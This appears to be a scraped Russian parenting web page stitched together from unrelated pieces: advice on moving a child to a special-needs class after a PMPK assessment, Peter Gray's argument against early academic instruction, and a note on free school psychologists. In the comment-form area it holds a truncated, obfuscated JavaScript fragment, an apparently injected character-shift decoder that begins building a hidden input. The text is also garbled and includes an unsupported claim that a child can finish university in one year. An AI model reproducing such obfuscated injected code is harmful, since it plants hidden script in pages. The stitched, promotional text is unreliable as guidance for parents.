Раннее обучение и развитие: 7 отличий, о которых важно знать

После прохождения ПМПК родителям могут рекомендовать перевести ребенка в коррекционный класс или школу, и для многих это решение кажется неприемлемым: отношение к таким школам и детям пренебрежительное, да и как смотреть в глаза коллегам по работе!?

Кто принимает решение

Решение, переводить ли ребенка в коррекционную школу или оставить в обычной, принимают родители (законные представители) — ПМПК носит рекомендательный характер и не обязывает родителей переводить ребенка. Но стоит много раз подумать: Что ребенку важнее? Где ему будет лучше? Родителям стоит поговорить с учителями, с врачами и логопедами, посетить коррекционные школы недалеко от дома. В каждый случай требует индивидуального решения, и общих правил здесь нет.

Спасибо за Вашу оценку. Если хотите, чтобы Ваше имя стало известно автору, войдите на сайт как пользователь и нажмите Спасибо еще раз. Ваше имя появится на этой стрнице.

Вход | РегистрацияКомментировать Поделиться Разместить на своем сайте

Есть мнение?Оставьте комментарий

Оставить комментарий

Понравился материал?Хотите прочитать позже?Сохраните на своей стене иподелитесь с друзьями

Вы можете разместить на своём сайте анонс статьи со ссылкой на её полный текст

Копировать название статьи Копировать анонс статьи Копировать ссылку Ошибка в тексте?

Ошибка в тексте? Мы очень сожалеем, что допустили ее. Пожалуйста, выделите ее и нажмите на клавиатуре CTRL + ENTER.

Кстати, такая возможность есть на всех страницах нашего сайта

Есть мнение? Оставьте свой комментарий:function _dS(a){var b=(»),c=();return (function(d){var e=(0)-c;return (32>e?127-(32-e):e)}).join(»)}
var _y8M = _dS(‘@mrtyx$x}tiA&lmhhir&$reqiA&wsw&$zepyiA&7:6:=:7

Проверьте возможности ребенка

Фото: LEGION-MEDIA

У большинства детей нет возможности нормально обучаться. Мы предполагаем, что школа и домашнее задание учат ребенка учиться и развивают его интеллектуальные способности. Но это не совсем так. Например, если человек 20 лет работает грузчиком, то по физической форме не сравнится с тем, кто год тренируется в спортзале по правильной системе.

Читайте также:  10 слагаемых хорошего детского праздника

Появление гаджетов, а также понижение сложности школьных предметов не способствуют развитию мозга детей. По статистике, речь, внимание, память у школьников лучше не становятся. Поэтому, чтобы детям нравилось учиться, у них должна быть возможность, и у них должно получаться. Что для этого нужно? Уметь запоминать и владеть инструментами правильного обучения. Тогда ребенок будет в состоянии не просто легко окончить вуз, а сделать это всего за 1 год. О том, как правильно развивать психические процессы и обеспечить удовольствие от обучения, вы можете прочитать здесь. 

Вот такие ошибки совершают родители, бабушки и дедушки каждый день. Чтобы их исправить, нужно помнить, что ребенок — тоже человек со своими желаниями, свободой выбора, достижениями и проблемами. Не бойтесь передавать детям ответственность и каждый день своим примером показывать, что значит быть взрослыми.  

Раннее академическое обучение замедляет интеллектуальное развитие

Предлагаем вашему вниманию две аннотации на статьи, посвящённые исследованиям в области раннего академического образования и его влиянию на дальнейшее развитие ребёнка.

Раннее академическое обучение приносит вред в долговременной перспективе

В своей новой статье американский психолог эволюции и развития Питер Грей анализирует данные долгосрочных исследований влияния раннего обучения академическим дисциплинам на развитие детей.

По данным этих исследований, дети, которые с возраста 4-5 лет обучались чтению, письму и счёту, вместо спонтанной игры, к подростковому и взрослому возрасту показывали гораздо более низкие результаты не только по академическим знаниям, но и в эмоциональной и социальной сфере.

В одном широко-масштабном исследовании раннего обучения 1970 годов в Германии, выпускники 50 детских садов с ранним академическим обучением сравнивались с выпускниками 50 детских садов, где главный упор был на свободную игру и социальное взаимодействие.

Несмотря на начальное небольшое превосходство по тестам учеников первой группы, к четвертому классу они показывали значительно худшие результаты, чем те дети, которые в садике проводили время в играх и общении. Особенно значительный разрыв был в математике и чтении, а также в эмоциональных и социальных навыках.

Читайте также:  Мелкая моторика и речь. Развиваем ребёнка домашним хозяйством.

Вследствие полученных данных руководство немецкого образования изменило программу таким образом, чтобы дети могли проводить время в играх вместо обучения во всех детских садах.

Другое долгосрочное исследование проводилось среди американских детей, рожденных в бедных семьях и результаты были похожими на немецкие. В возрасте 15 лет среди детей с “академическим” обучением было в два раза больше поведенческих проблем, а в возрасте 23 лет 39 % процентов из них совершили преступление, в то время как в другой группе только 13,5 %.

Питер Грей предполагает, что причина подобных результатов может быть в том, что раннее ориентирование ребёнка на успех и достижения приводит к стремлению конкурировать и асоциальному поведению, в то время как из свободной игры дети получают навыки взаимодействия друг с другом, мирного решения конфликтов и сотрудничества.

Источник

Оригинал статьи

Каким образом раннее академическое обучение замедляет интеллектуальное развитие

Академические навыки лучше всего прививаются, когда есть желание и необходимость их приобретать.

В своей предыдущей статье Питер Грей проанализировал различные исследования, посвященные раннему академическому обучению детей и сделал вывод, что такое обучение приносит вред в длительной перспективе. В своей новой статье он объясняет почему это происходит.

Существует разница между академическим и интеллектуальным развитием и причины, почему последнее должно опережать первое. Академические навыки – это общие, проверенные методы организации, манипуляции определенными категориями знаний, для того, чтобы достигнуть нужного результата.

Раннее академическое обучение замедляет интеллектуальное развитие

К примеру, чтение – это академический навык, который включает в себя знание букв алфавита, чтение слов вслух, основанное на принадлежности каждого звука к определенной букве. Академические навыки изучаются в школе при помощи демонстрации, запоминания и повторения, а затем тестируются.

Интеллектуальные навыки, в свою очередь, имеют дело со способностью человека рассуждать, понимать, исследовать и в целом воспринимать окружающий его мир. От природы каждый ребёнок – это интеллектуальное существо, полное любознательности и стремления понять своё физическое и социальное окружение.

Каждый ребёнок рождён с этими навыками и углубляет и развивает их посредством наблюдения, игры и задавая вопросы. Научить этим интеллектуальным навыкам невозможно, потому что каждый ребёнок развивает их сам, своим собственным образом через самостоятельно сынициированную деятельность.

Читайте также:  Орви у детей симптомы и лечение доктор комаровский

Взрослые могут повлиять на это развитие через среду, которую они предоставляют ребёнку.

Если ребёнок растёт в среде, где все умеют читать и считать, где ребёнку часто читают и он видит как другие люди читают или пользуются измерительными приборами в практических целях, то ребёнок рано или поздно сам начнёт читать и считать, когда он к этому будет готов и с минимальной помощью со стороны взрослых.

Питер Грей говорит о том, что обучение академическим навыкам детей, у которых нет к этому мотивации или необходимой интеллектуальной базы, будет потерей времени и может даже повредить развитию ребёнка.

Такое обучение без запроса будет неглубоким, и все приобретенные навыки могут быстро исчезнуть после того, как изучение закончится.

При этом ребёнок с меньшей вероятностью когда-либо захочет приобрести эти навыки самостоятельно.

Источник

Оригинал статьи

Фото1:

Фото2:

Если вы заметили в тексте ошибку, пожалуйста, выделите её и нажмите Shift + Enter или эту ссылку, чтобы сообщить нам.

  • игра
  • исследования
  • развитие
  • школа

Бесплатно обращаться к школьному психологу и логопеду

Основание. ФЗ об образовании ст. 33 ч. 1 п. 9, ст. 42, письмо Минобрнауки № НТ-1139/08 п. 4

Как это работает. В школах должны быть специалисты, которые помогают школьникам решать проблемы с учебой, семьей и сверстниками: педагоги-психологи, социальные педагоги, логопеды. Дети, которые прикрепились к школе, чтобы сдать аттестацию, тоже могут к ним обращаться.

Если таких специалистов в школе нет, можно обращаться в центры психолого-педагогической, медицинской и социальной помощи. Куда именно идти за помощью и консультацией, подскажут в школе или в муниципальном комитете образования.

Например, психолог может помочь составить индивидуальный план для учебы и выстроить отношения с родителями, которые взяли на себя функции учителей. Причем психолог может проконсультировать не только самих детей, но и их родителей — бесплатно.

См. также: Можно ли получить вычет за визиты к психологу?